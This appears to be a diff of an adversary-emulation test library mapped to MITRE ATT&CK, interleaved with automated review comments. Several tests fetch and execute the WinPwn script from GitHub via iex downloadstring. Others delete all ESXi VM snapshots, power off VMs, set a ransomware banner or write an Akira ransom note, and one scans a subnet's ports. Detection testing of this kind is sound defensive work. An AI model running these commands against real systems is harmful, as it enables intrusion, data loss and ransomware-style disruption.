command: 'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v
CurrentBuildNumber
'
name: command_prompt
elevation_required: false
T1016.002:
technique:
modified: '2023-10-05T11:35:30.887Z'
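Review bot: The description of the new `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName` test promises "the OS Product Name will be displayed", but on Windows 11 this value still reads "Windows 10 ..." (the registry string was not updated for Windows 11), so the output alone misidentifies the OS; note that in the description and point readers at the sibling `CurrentBuildNumber` test (builds 22000 and above are Windows 11). The `gdr -PSProvider ''FileSystem''` change is a YAML quoting normalisation only; the command PowerShell receives is unchanged.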
@@ -85692,7 +86231,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -85980,7 +86519,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -86012,7 +86551,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -87480,7 +88019,59 @@ discovery:
executor:
name: command_prompt
elevation_required: false
command: PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe
command: 'PathToAtomicsFolder\..\ExternalPayloads\LanguageKeyboardLayout.exe
'
- name: Discover System Language with WMIC
auto_generated_guid: 4758003d-db14-4959-9c0f-9e87558ac69e
description: "WMIC (Windows Management Instrumentation Command-line) is a command-line
tool that provides a simplified interface to query and manage Windows system
configurations, processes, and hardware information using WMI. \n\nThe command
in this test retrieves information about the system's locale, operating system
language, and multilingual user interface (MUI) languages.\n"
supported_platforms:
- windows
input_arguments:
target_host:
description: "The host that will be queried.\n\nIf the host contains special
characters, it may need to be wrapped in double quotes or double + single
quotes. \n\nFor example: \"DESKTOP-123\" or \"'DESKTOP-123'\".\n"
type: string
default: localhost
format_style:
description: You can specify multipe output formats for wmic such as table,
list and csv.
type: string
default: table
executor:
name: command_prompt
elevation_required: false
command: 'wmic /node:#{target_host} os get Locale,OSLanguage,MUILanguages
/format:#{format_style}
'
- name: Discover System Language with Powershell
auto_generated_guid: 1f23bfe8-36d4-49ce-903a-19a1e8c6631b
description: "This PowerShell script collects key system settings, such as the
UI language, user language preferences, system locale, current culture, UI
culture, and time zone, into a hash table. \n\nIt then outputs these settings
in a readable key-value format directly to the terminal. The script is simple
and efficient for quickly displaying system configuration details.\n"
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |-
$info = @{
UILanguage = Get-WinUILanguageOverride
UserLanguages = (Get-WinUserLanguageList).LanguageTag -join ', '
SystemLocale = Get-WinSystemLocale
CurrentCulture = [System.Globalization.CultureInfo]::CurrentCulture.Name
CurrentUICulture = [System.Globalization.CultureInfo]::CurrentUICulture.Name
TimeZone = (Get-TimeZone).Id
}
$info.GetEnumerator() | ForEach-Object { "$($_.Name): $($_.Value)" }
T1012:
technique:
modified: '2023-04-03T18:56:37.011Z'
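Review bot: In the PowerShell test, `UILanguage = Get-WinUILanguageOverride` is empty on most hosts, because that cmdlet only returns a value when the user has explicitly set a UI language override; for the effective UI language use `(Get-UICulture).Name` (the block already captures the same thing as `CurrentUICulture`, so the key is redundant as written). Use `$info = [ordered]@{ ... }` so the key-value output comes out in the listed order rather than hash-table order. For the WMIC test, `wmic.exe` is deprecated and on Windows 11 24H2 is a Feature on Demand that is not installed by default, so the test needs a `dependencies` entry that checks for it (or a note that the test is expected to fail there), and "multipe" in the `format_style` description should be "multiple".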
@@ -88287,7 +88878,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -88319,7 +88910,7 @@ discovery:
it to the specific needs of the environment. Use "-arg" notation to add
arguments separated by spaces.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
@@ -88609,7 +89200,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
name: powershell
@@ -88621,7 +89211,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
name: powershell
@@ -88634,7 +89223,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
name: powershell
@@ -88646,7 +89234,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
name: powershell
@@ -88660,7 +89247,9 @@ discovery:
input_arguments:
ip_address:
description: IP-Address within the target subnet. Default is empty and script
tries to determine local IP address of attacking machine.
tries to determine local IP address of attacking machine. A comma separated
list of targe IPs is also accepted (useful to simulate a wider scan while
only scanning key host e.g., honeypots)
type: string
default: ''
port_list:
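Review bot: Typos in the new description text: "A comma separated list of targe IPs" should be "target IPs", and "only scanning key host e.g., honeypots" should be "key hosts, e.g. honeypots". Since the argument now accepts either a single address or a list, say which separator is accepted (comma) and that whitespace around entries is tolerated, which the executor's `$_.Trim()` implies.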
@@ -88672,33 +89261,58 @@ discovery:
type: string
default: '200'
executor:
command: |
command: |-
$ipAddr = "#{ip_address}"
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
$ports = #{port_list}
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
name: powershell
- name: Remote Desktop Services Discovery via PowerShell
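Review bot: the final `else { Write-Host "[Error] Invalid Inputs"; exit 1 }` branch is unreachable, because `-like "*,*"` and `-notlike "*,*"` are complementary conditions; if the intent is to reject malformed input, validate each entry with `[System.Net.IPAddress]::TryParse` (or at least check `$ip_list.Count -gt 0`) instead. The two branches also duplicate the entire `foreach ($ip ...) { foreach ($port ...) { ... } }` probe loop; building a `$targets` array in each branch (the split list, or `1..254 | ForEach-Object { "$subnetSubstring$_" }`) and running one loop afterwards would halve the block and keep the two paths from drifting. Minor: the `TcpClient` created per probe is only closed when `Connected` is true, so add `$tcp.Dispose()` after the `if ($tcp.Connected)` check (or wrap it in `finally`) to avoid leaking sockets across 254 x N attempts; and the pre-existing `Get-NetIPAddress ... -ExpandProperty IPAddress` can return more than one address for an interface, in which case `$ipAddr.Substring` fails on an array, so `Select-Object -First 1` there would be safer.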
@@ -88796,7 +89410,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Dotnetsearch -noninteractive -consoleoutput
name: powershell
@@ -88808,7 +89421,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
dotnet -consoleoutput -noninteractive
name: powershell
@@ -88819,7 +89431,6 @@ discovery:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powerSQL -noninteractive -consoleoutput
name: powershell
@@ -89123,6 +89734,20 @@ discovery:
'
name: command_prompt
- name: Discover System Time Zone via Registry
auto_generated_guid: 25c5d1f1-a24b-494a-a6c5-5f50a1ae7f47
description: |
Identify the Operating System Time Zone via registry with the reg.exe command.
Upon execution, the system Time Zone will be shown.
supported_platforms:
- windows
executor:
command: 'reg query "HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation"
/v TimeZoneKeyName
'
name: command_prompt
elevation_required: false
resource-development:
T1583:
technique:
@@ -93926,7 +94551,7 @@ reconnaissance:
privileges and move laterally. "
modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
name: 'Active Scanning: Wordlist Scanning'
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
of scanning, such as large quantities originating from a single source (especially
if the source is known to be associated with an adversary/botnet). Monitor
@@ -93944,7 +94569,41 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
identifier: T1595.003
atomic_tests:
- name: Web Server Wordlist Scan
auto_generated_guid: 89a83c3e-0b39-4c80-99f5-c2aa084098bd
description: 'This test will scan a target system with a wordlist of common
directories and file paths.
'
supported_platforms:
- windows
- linux
- macos
input_arguments:
target:
description: The target system to scan
type: string
default: http://localhost
wordlist:
description: The wordlist to use for scanning
type: path
default: PathToAtomicsFolder/T1595.003/src/wordlist.txt
request_timeout:
description: The timeout for each request (in seconds)
type: integer
default: 5
output_file:
description: File to output results to
type: string
default: "$env:TMPDIR/wordlist_scan.txt"
executor:
command: |
Import-Module "PathToAtomicsFolder/T1595.003/src/WebServerScan.ps1"
Invoke-WordlistScan -Target "#{target}" -Wordlist "#{wordlist}" -Timeout "#{request_timeout}" -OutputFile "#{output_file}"
Write-Host "Scan complete. Results saved to: #{output_file}"
name: powershell
T1591.004:
technique:
x_mitre_platforms:
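Review bot: the `output_file` default `"$env:TMPDIR/wordlist_scan.txt"` only resolves on macOS; `TMPDIR` is normally unset on Windows (which uses `TEMP`/`TMP`) and often unset on Linux, so the default collapses to `/wordlist_scan.txt` and the write fails or lands in the filesystem root, despite `supported_platforms` listing all three. A platform-neutral default such as `Join-Path ([System.IO.Path]::GetTempPath()) wordlist_scan.txt` avoids that. The test also has no `cleanup_command` to remove `#{output_file}`, and it passes `-Timeout "#{request_timeout}"` as a quoted string while the argument is declared `type: integer`; dropping the quotes keeps the types consistent. `PathToAtomicsFolder/T1595.003/src/WebServerScan.ps1` and `src/wordlist.txt` are referenced but not part of this compare, so please confirm they are included in the same change.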
@@ -95688,6 +96347,48 @@ impact:
Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force
name: powershell
elevation_required: true
- name: ESXi - Change Welcome Message on Direct Console User Interface (DCUI)
auto_generated_guid: 30905f21-34f3-4504-8b4c-f7a5e314b810
description: |
Changes the ESXi welcome message to potentially display ransom information.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/esxcli/#change%20display%20information)
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
dependency_executor_name: powershell
dependencies:
- description: 'Check if we have plink
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "esxcli system welcomemsg set -m ''RANSOMWARE-NOTIFICATION''"
'
name: command_prompt
elevation_required: false
T1496.004:
technique:
modified: '2024-10-16T17:59:27.535Z'
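Review bot: no `cleanup_command` restores the DCUI banner after the test, so the `RANSOMWARE-NOTIFICATION` message persists on the host; capture the current value with `esxcli system welcomemsg get` before the change, or set the message back to an empty string via the same `plink` invocation, as cleanup. Also, `plink -batch` aborts rather than prompts when the server's host key is not already cached, so the description or a dependency should state that the ESXi host key must be trusted beforehand (or the command should pass `-hostkey`). Minor wording: the `vm_user` description reads "privilege user account"; "privileged user account" matches the `vm_pass` description.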
@@ -96204,7 +96905,9 @@ impact:
type: path
default: "$env:temp\\test.txt"
dependencies:
- description: 'GPG must exist at (#{GPG_Exe_Location})
- description: 'GPG must exist at (#{GPG_Exe_Location}). If -GetPrereqs fails,
try to install GPG4WIN manually at ''https://www.gpg4win.org/download.html''.
Once done, run -CheckPrereqs to confirm that it works.
'
prereq_command: 'if (test-path ''#{GPG_Exe_Location}''){exit 0} else {exit
@@ -96212,19 +96915,19 @@ impact:
'
get_prereq_command: |
Set-Content -Path "#{File_to_Encrypt_Location}" -Value "populating this file with some text" # Create the test.txt file
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://files.gpg4win.org/gpg4win-4.1.0.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe"
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" /S
executor:
name: powershell
elevation_required: false
command: 'cmd /c ''#{GPG_Exe_Location}'' -c ''#{File_to_Encrypt_Location}''
'
cleanup_command: 'remove-item ''#{File_to_Encrypt_Location}.gpg'' -force -erroraction
silentlycontinue | out-null
'
command: |
Set-Content -Path "#{File_to_Encrypt_Location}" -Value "populating this file with some text" # Create the test.txt file again in case prereqs failed
cmd /c "`"C:\Program Files (x86)\GnuPG\bin\gpg.exe`" --passphrase 'SomeParaphraseBlah' --batch --yes -c `"#{File_to_Encrypt_Location}`""
cleanup_command: |
Remove-Item -Path "#{File_to_Encrypt_Location}" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "#{File_to_Encrypt_Location}.gpg" -Force -ErrorAction SilentlyContinue
- name: Data Encrypt Using DiskCryptor
auto_generated_guid: 44b68e11-9da2-4d45-a0d9-893dabd60f30
description: 'DiskCryptor, an open source encryption utility, can be exploited
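Review bot: the new `command:` hard-codes `C:\Program Files (x86)\GnuPG\bin\gpg.exe` while the prereq check and the description still key off `#{GPG_Exe_Location}`; a user who overrides that argument will pass `-CheckPrereqs` and then run a different binary (or none). Use ``"`"#{GPG_Exe_Location}`"`` in the `cmd /c` string so the executor and the dependency stay in sync. The reordering of `name`/`elevation_required` ahead of `command` is harmless, and the added `Set-Content` plus the two-file `cleanup_command` make the test self-contained, which is an improvement over the previous single `remove-item`.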
@@ -96293,7 +96996,7 @@ impact:
echo "If you' re indeed interested in our assistance and the services we provide you can reach out to us following simple instructions:" >> $env:Userprofile\Desktop\akira_readme.txt
echo "" >> $env:Userprofile\Desktop\akira_readme.txt
echo "1. Install TOR Browser to get access to our chat room - https://www.torproject.org/download/." >> $env:Userprofile\Desktop\akira_readme.txt
echo "2. Paste this link https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt
echo "2. Paste this link - https://akira.onion" >> $env:Userprofile\Desktop\akira_readme.txt
echo "3. Use this code - - to log into our chat." >> $env:Userprofile\Desktop\akira_readme.txt
echo "" >> $env:Userprofile\Desktop\akira_readme.txt
echo "Keep in mind that the faster you will get in touch, the less damage we cause" >> $env:Userprofile\Desktop\akira_readme.txt
@@ -96661,6 +97364,49 @@ impact:
'
name: command_prompt
- name: ESXi - Delete VM Snapshots
auto_generated_guid: 1207ddff-f25b-41b3-aa0e-7c26d2b546d1
description: |
Deletes all snapshots for all Virtual Machines on an ESXi Host
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#inhibit%20recovery)
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
dependency_executor_name: powershell
dependencies:
- description: 'Check if we have plink
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk ''NR>1 {print
$1}''`; do vim-cmd vmsvc/snapshot.removeall $i & done"
'
name: command_prompt
elevation_required: false
T1498:
technique:
modified: '2024-10-15T16:01:00.510Z'
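Review bot: `vim-cmd vmsvc/snapshot.removeall` against every VM returned by `getallvms` is irreversible, and the test has neither a `cleanup_command` nor a scope argument, so the description should state plainly that all snapshots on the host are destroyed, and a `vm_id` (or name filter) input argument defaulting to a designated test VM would make the atomic safe to run outside a disposable lab. The `& done` backgrounds each removal, so the `plink` session returns as soon as the loop has been dispatched and the test can report success while removals are still in flight; drop the `&` (or add `wait` before exiting) if the exit status is meant to reflect completion. Same `-batch` caveat as the other plink-based ESXi tests: an uncached host key makes plink abort rather than prompt.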
@@ -97389,6 +98135,49 @@ impact:
'
name: command_prompt
elevation_required: false
- name: ESXi - vim-cmd Used to Power Off VMs
auto_generated_guid: 622cc1a0-45e7-428c-aed7-c96dd605fbe6
description: |
Adversaries may power off VMs to facilitate the deployment of ransomware payloads.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#power%20off%20vm)
supported_platforms:
- windows
input_arguments:
vm_host:
description: Specify the host name or IP of the ESXi server.
type: string
default: atomic.local
vm_user:
description: Specify the privilege user account on the ESXi server.
type: string
default: root
vm_pass:
description: Specify the privileged user's password.
type: string
default: password
plink_file:
description: Path to Plink
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe
dependency_executor_name: powershell
dependencies:
- description: 'Check if we have plink
'
prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}"
executor:
command: 'echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user}
-pw "#{vm_pass}" "for i in `vim-cmd vmsvc/getallvms | awk ''NR>1 {print
$1}''`; do vim-cmd vmsvc/power.off $i & done"
'
name: command_prompt
elevation_required: false
initial-access:
T1133:
technique:
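Review bot: `vim-cmd vmsvc/power.off` is issued for every VM on the host with no `cleanup_command` to bring them back; add a cleanup that iterates the same `getallvms` list with `vim-cmd vmsvc/power.on`, or better, take a `vm_id` input argument so the test targets one designated VM. The trailing `&` after each `power.off` makes the loop return before the VMs have actually stopped, so the executor can exit 0 before the effect is observable; drop it if sequential completion is wanted. The `vm_user` description again reads "privilege user account" where "privileged user account" is meant.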
@@ -99254,7 +100043,6 @@ initial-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
name: powershell
@@ -99266,7 +100054,6 @@ initial-access:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
name: powershell
@@ -100193,7 +100980,7 @@ exfiltration:
description: Set to '-b32' to use base32 encoding of data. Might be required
by some DNS resolvers.
type: string
default:
default:
dependency_executor_name: powershell
dependencies:
- description: 'DNSExfiltrator powershell file must exist on disk at specified
@@ -100817,11 +101604,11 @@ exfiltration:
username:
description: Username for FTP server login
type: string
default:
default:
password:
description: Password for FTP server login
type: string
default:
default:
executor:
command: |
$Dir_to_copy = "$env:windir\temp"
+6 -2
@@ -1,6 +1,10 @@
# T1001.002 - Data Obfuscation via Steganography
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1001/002)
<blockquote>Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. </blockquote>
<blockquote>
Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.
</blockquote>
## Atomic Tests
@@ -83,7 +87,7 @@ if (!(Test-Path "#{passwords_file}")) {exit 1} else {
##### Get Prereq Commands:
```powershell
Write-Output "Generating random passwords and saving to file..."
$passwords = 1..10 | ForEach-Object { Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12 }
$passwords = 1..10 | ForEach-Object { -join ((1..12) | ForEach-Object { @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') + @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') + @('0','1','2','3','4','5','6','7','8','9') + @('!','@','#','$','%','^','&','*','(','(',')','-','=','+','_','[',']','{','}','|',';',';',':',',','<','>','?') | Get-Random }) }
$passwords | Out-File -FilePath "#{passwords_file}"
```
##### Description: Tarz file to embed in image must exist
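Review bot: the replacement fixes a real bug (`Get-Random -InputObject '<string>' -Count 12` treats the single string as one object, so the old line wrote the whole alphabet to the file instead of a 12-character password), but the new symbol array lists `'('` and `';'` twice and drops `'.'` relative to the original `!@#$%^&*()-_=+[]{}|;:,.<>?` set, which skews the per-character distribution and silently changes the alphabet. A shorter, unbiased form is `$chars = [char[]]'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?'` followed by `-join ((1..12) | ForEach-Object { $chars | Get-Random })`, which keeps the original character set and is reviewable at a glance.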
+1 -1
@@ -54,7 +54,7 @@ atomic_tests:
}
get_prereq_command: |
Write-Output "Generating random passwords and saving to file..."
$passwords = 1..10 | ForEach-Object { Get-Random -InputObject ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?') -Count 12 }
$passwords = 1..10 | ForEach-Object { -join ((1..12) | ForEach-Object { @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') + @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') + @('0','1','2','3','4','5','6','7','8','9') + @('!','@','#','$','%','^','&','*','(','(',')','-','=','+','_','[',']','{','}','|',';',';',':',',','<','>','?') | Get-Random }) }
$passwords | Out-File -FilePath "#{passwords_file}"
- description: |
Tarz file to embed in image must exist
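Review bot: same password-generation line as in the T1001.002 markdown: the move away from `Get-Random -InputObject '<string>' -Count 12` is correct (that form returns the whole string as a single object), but the hand-typed array duplicates `'('` and `';'` and omits `'.'`, so the YAML source should use `[char[]]'<alphabet>' | Get-Random` per position with the original alphabet string rather than a spelled-out, subtly different list; since the docs are generated from this file, fixing it here also fixes the markdown.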
+5 -1
@@ -1,6 +1,8 @@
# T1003.001 - OS Credential Dumping: LSASS Memory
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/001)
<blockquote>Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
<blockquote>
Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
@@ -27,6 +29,8 @@ The following SSPs can be used to access credentials:
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
</blockquote>
## Atomic Tests
+5 -2
@@ -1,6 +1,8 @@
# T1003.002 - OS Credential Dumping: Security Account Manager
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/002)
<blockquote>Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access.
<blockquote>
